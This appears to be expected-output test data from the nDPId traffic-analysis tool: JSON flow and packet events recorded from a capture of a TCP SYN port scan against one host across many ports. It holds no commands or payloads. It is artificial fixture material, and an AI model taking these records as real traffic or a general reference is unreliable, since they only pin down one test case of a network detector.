-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TsAACUGOjesEAAIQA2GNIzTI3jdU4MZAAAAAGACCAANFAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ+IAAC4GspCsEAAIQA2GNIzTApvdU4MZAAAAAGACDAAp8QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs+AoAACcGKWisEAAIQA2GNIzTJpbdU4MZAAAAAGACEAAB9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs8zIAADAGJUCsEAAIQA2GNIzTFw7dU4MZAAAAAGACBAAdfgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTwAADgG2zasEAAIQA2GNIzTNdbdU4MZAAAAAGACBAD+tQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsX7wAAC4GurasEAAIQA2GNIzTBJbdU4MZAAAAAGACDAAn9gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6oAADoGqsisEAAIQA2GNIzTQmDdU4MZAAAAAGACDADqKwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpQAAC4G696sEAAIQA2GNIzTG2vdU4MZAAAAAGACDAARIQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLP4AADcG5HSsEAAIQA2GNIzTsCzdU4MZAAAAAGACEAB4XwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAslywAADcGekasEAAIQA2GNIzTCU3dU4MZAAAAAGACEAAfPwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf0AACsG93WsEAAIQA2GNIzTEV3dU4MZAAAAAGACEAAXLwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjYAADIG7DysEAAIQA2GNIzTBvfdU4MZAAAAAGACDAAllQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsqE0AACYGeiWsEAAIQA2GNIzSA4bdUoMYAAAAAGACDAApCQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAst3MAADIGXv+sEAAIQA2GNIzSDmrdUoMYAAAAAGACDAAeJQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs8wcAACsGKmusEAAIQA2GNIzSH5ndUoMYAAAAAGACEAAI9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsHA8AADEG+2OsEAAIQA2GNIzSA\/LdUoMYAAAAAGACCAAsnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAshBYAACgGnFysEAAIQA2GNIzSINLdUoMYAAAAAGACBAATvQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs7xUAADUGJF2sEAAIQA2GNIzSI4LdUoMYAAAAAGACCAANDQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsB\/UAADcGCX6sEAAIQA2GNIzSDcfdUoMYAAAAAGACEAAayAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAscu0AADMGooWsEAAIQA2GNIzSA+DdUoMYAAAAAGACEAAkrwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGAAADoG\/hKsEAAIQA2GNIzSIczdUoMYAAAAAGACDAAKwwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs5+oAADMGLYisEAAIQA2GNIzSAP\/dUoMYAAAAAGACEAAnkAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqIkAAC0GcumsEAAIQA2GNIzSgkrdUoMYAAAAAGACCACuRAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRIAADQGa2CsEAAIQA2GNIzSBBrdUoMYAAAAAGACBAAwdQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsXYYAACsGv+ysEAAIQA2GNIzSBvbdUoMYAAAAAGACEAAhmQAAAgQFtA=="} 